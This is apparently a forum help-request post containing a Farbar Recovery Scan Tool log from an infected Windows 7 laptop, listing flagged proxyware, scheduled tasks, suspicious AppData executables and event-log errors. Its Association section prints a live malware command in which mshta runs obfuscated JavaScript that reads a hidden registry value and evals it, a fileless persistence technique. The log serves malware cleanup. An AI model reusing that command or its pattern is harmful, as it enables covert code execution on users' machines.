Jump to content

infected


Recommended Posts

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by jay (05-04-2017 22:16:04)
Running from C:\Users\jay\Desktop
Windows 7 Professional Service Pack 1 (X64) (2017-04-01 18:41:41)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2023460998-3142373190-2512299115-500 - Administrator - Disabled)
Guest (S-1-5-21-2023460998-3142373190-2512299115-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2023460998-3142373190-2512299115-1002 - Limited - Enabled)
jay (S-1-5-21-2023460998-3142373190-2512299115-1000 - Administrator - Enabled) => C:\Users\jay

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ACID Xpress 7.0 (HKLM-x32\...\{444695CF-DD46-11DF-8F04-005056C00008}) (Version: 7.0.73 - Sony)
Amazon Music (HKU\S-1-5-21-2023460998-3142373190-2512299115-1000\...\Amazon Amazon Music) (Version: 5.4.0.1779 - Amazon Services LLC)
DragonBoost (HKU\S-1-5-21-2023460998-3142373190-2512299115-1000\...\DragonBoost) (Version:  - )
FREE Hi-Q Recorder 1.95 (HKLM-x32\...\FREE Hi-Q Recorder_is1) (Version:  - Rick Roemer, (Roemer Software))
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.12.10 - Lenovo)
Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
Reimage Repair (HKLM\...\Reimage Repair) (Version: 1.8.4.9 - Reimage) <==== ATTENTION
Screenblast ACID 4.0 (HKLM-x32\...\{662A3F7D-DE1C-4EA6-AC6B-DDAA03193DF0}) (Version: 4.0.132 - Screenblast)
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
Traffic Exchange (x32 Version: 2.1.0 - Microleaves) Hidden <==== ATTENTION
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01E6469F-38B2-490D-87A9-F1A6155209FB} - System32\Tasks\Traffic Exchange v209 - 2
Task: {0661829F-F4B7-414D-9793-2B56168D6889} - System32\Tasks\Traffic Exchange v2 - 1
Task: {20A52686-2CAC-4F49-8E19-F275C789F4E8} - System32\Tasks\{690199AA-0B38-834B-D76E-635C46C8072A} => C:\Users\jay\AppData\Roaming\wincy\SyncTask.exe
Task: {2D638A1B-B2F2-425C-922D-23CE2936CE10} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-01-19] (Reimage®) <==== ATTENTION
Task: {40CAD51B-830F-4F80-A94E-32169FB7541D} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)
Task: {48F433E1-4619-4106-AE35-0F6EE7F1B3A5} - System32\Tasks\Traffic Exchange
Task: {564571F0-0B3D-452C-A940-94ED8C871B73} - System32\Tasks\Traffic Exchange Guard
Task: {643592C3-9A6B-4CAD-8378-31F6FC1083A6} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-13] (Reimage ltd.) <==== ATTENTION
Task: {65B5571B-694F-4E6C-A0D3-E3EA77772896} - System32\Tasks\{47D2317D-F93E-4F96-909E-7EDBC1E51DD7} => pcalua.exe -a C:\Users\jay\AppData\Roaming\Microsoft\AdVPN\AdVPN.exe -c /u
Task: {6A90B3D2-363B-49AD-8046-5A07F4B53365} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2016-04-20] (Lenovo)
Task: {6A98A6B9-9534-45F8-AC2D-ED13A6C04F7C} - System32\Tasks\Traffic Exchange v209 - 1
Task: {7D9214F9-3513-45AE-80EC-304B50159913} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {8A634D57-CA42-4710-84F0-5541A8F4066C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {9000E043-586E-4C39-92B1-569E37271840} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {9CD9DD2C-782D-46DA-8318-002703FF9D51} - System32\Tasks\Traffic Exchange v2 - 2
Task: {A6CB78A9-94EC-44C8-A436-7FCC2A9E44B0} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-04-03] (Byte Technologies LLC) <==== ATTENTION
Task: {BECBBC2A-A0C2-4708-B391-0917AC01C87F} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()
Task: {C69BE112-EFB2-48D1-8FE9-9A252153D83C} - System32\Tasks\Traffic Exchange v209 - 3
Task: {C7CF0726-13B1-446C-B089-C287F4C2306E} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {CCB10AB1-7972-45F0-A8B3-16A87F4D73B4} - System32\Tasks\Traffic Exchange v2 - 3
Task: {E75A75E4-54D3-438F-A4BB-CB6CBADAE4D1} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {EBDCDB31-6C04-4795-B13D-60388657F92A} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)
Task: {F558FF86-CDC6-477C-89C0-DC332E8D9130} - System32\Tasks\Traffic Exchange Guardian
Task: {FD3A6BDE-803F-45A6-916F-282BA4D8EB94} - System32\Tasks\Traffic Exchange Updater

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Traffic Exchange Updater.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\Windows\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\Windows\Tasks\{690199AA-0B38-834B-D76E-635C46C8072A}.job => C:\Users\jay\AppData\Roaming\wincy\SyncTask.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2016-05-25 08:38 - 2016-05-25 08:38 - 00129304 _____ () C:\Program Files\ByteFence\x64\lz4_x64.dll
2016-06-03 09:50 - 2016-04-14 06:08 - 00107008 _____ () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2017-01-05 17:36 - 2017-01-05 17:36 - 00077824 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\dataup\dataup.exe
2017-04-05 11:22 - 2017-04-05 11:22 - 00008704 _____ () C:\Users\jay\AppData\Local\Temp\WS\realtek_amd64.exe
2017-01-13 20:09 - 2017-01-13 20:09 - 00896512 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\svcvmx\svcvmx.exe
2017-01-20 20:18 - 2017-01-20 20:18 - 01087488 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\svcvmx\vmxclient.exe
2012-03-21 11:05 - 2012-03-21 11:05 - 00051776 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2016-09-21 23:32 - 2016-09-21 23:32 - 00224768 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\dataup\help_dll.dll
2017-04-05 11:24 - 2017-04-05 11:24 - 00414208 _____ () C:\Users\jay\AppData\Local\Temp\WS\realtek_amd64.lib.dll
2017-04-05 20:22 - 2017-04-05 20:22 - 04498432 _____ () C:\Users\jay\AppData\Local\Temp\mdi064.dll
2017-04-05 20:24 - 2017-04-05 20:24 - 00014336 _____ () C:\Users\jay\AppData\Local\eistis.dll
2017-01-14 19:40 - 2017-01-14 19:40 - 53460992 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\svcvmx\libcef.dll
2016-05-31 11:43 - 2016-05-31 11:43 - 01976832 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\svcvmx\libglesv2.dll
2016-05-31 11:44 - 2016-05-31 11:44 - 00075264 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\svcvmx\libEGL.dll
2016-06-15 17:15 - 2016-06-15 17:15 - 17599640 _____ () C:\Users\jay\AppData\Local\ntuserlitelist\svcvmx\pepflashplayer.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-2023460998-3142373190-2512299115-1000\Software\Classes\de0a4233: "C:\Windows\system32\mshta.exe" "javascript:vMuZzV6x5="NFocG";m1a=new ActiveXObject("WScript.Shell");omM0l="Q";mv3a6j=m1a.RegRead("HKCU\\software\\muxfwtrymu\\dcdgjc");gt0HC4w="23lgg";eval(mv3a6j);oxzq0MkW="TYUZm3GD";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2023460998-3142373190-2512299115-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\jay\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{6D153742-0409-4C40-9AA0-E070CA480912}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{6C8F18CC-9632-4FD1-962F-420454FAEE1F}C:\users\jay\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\jay\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [UDP Query User{6B0852C7-D472-49A8-88CF-FA157A5EC42E}C:\users\jay\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\jay\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [{FC652259-1BA1-4D06-A55A-BEC12397C684}] => (Allow) C:\Windows\system32\rundll32.exe

==================== Restore Points =========================

01-04-2017 15:27:23 Scheduled Checkpoint
02-04-2017 22:42:11 Windows Update
03-04-2017 02:27:06 Windows Update
03-04-2017 20:09:54 Windows Update
04-04-2017 18:52:55 Windows Update
05-04-2017 20:16:44 Installed Screenblast ACID 4.0
05-04-2017 21:06:49 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/05/2017 09:19:46 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/05/2017 08:38:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/05/2017 08:38:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Explorer.EXE version 6.1.7601.23537 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 9cc

Start Time: 01d2ae6dfb738884

Termination Time: 10

Application Path: C:\Windows\Explorer.EXE

Report Id: 4d947963-1a61-11e7-8127-28d2441c6373

Error: (04/05/2017 07:39:12 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/04/2017 07:03:39 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/04/2017 06:50:39 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/03/2017 10:15:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/03/2017 09:59:33 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/03/2017 09:34:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/03/2017 09:13:11 PM) (Source: MsiInstaller) (EventID: 11935) (User: jay-PC)
Description: Product: MSVCRT Redists -- Error 1935. An error occurred during the installation of assembly 'Microsoft.VC80.ATL,type="win32",version="8.0.50727.4053",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86"'. Please refer to Help and Support for more information. HRESULT: 0x80070BC9. assembly interface: IAssemblyCacheItem, function: Commit, component: {97F81AF1-0E47-DC99-A01F-C8B3B9A1E18E}


System errors:
=============
Error: (04/05/2017 10:14:59 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:12:59 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:10:58 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:08:57 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:06:52 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:04:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:02:47 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 10:02:40 PM) (Source: DCOM) (EventID: 10001) (User: )
Description: Unable to start a DCOM Server: {C39EE728-D419-4BD4-A3EF-EDA059DBD935} as /. The error:
"170"
Happened while starting this command:
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

Error: (04/05/2017 10:00:47 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.

Error: (04/05/2017 09:58:46 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.


CodeIntegrity:
===================================
  Date: 2017-04-04 01:40:12.447
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:56:55.460
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:54:37.857
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:49:39.243
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:41:11.509
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:39:32.914
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:36:35.424
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:34:21.371
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

  Date: 2017-04-04 00:28:12.915
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz
Percentage of memory in use: 80%
Total physical RAM: 3793.67 MB
Available physical RAM: 743.68 MB
Total Virtual: 7585.52 MB
Available Virtual: 3727.08 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:287.99 GB) (Free:240.53 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1162D1D3)
Partition 1: (Active) - (Size=100 MB) - (Type=83)
Partition 2: (Not Active) - (Size=10 GB) - (Type=27)
Partition 3: (Not Active) - (Size=288 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.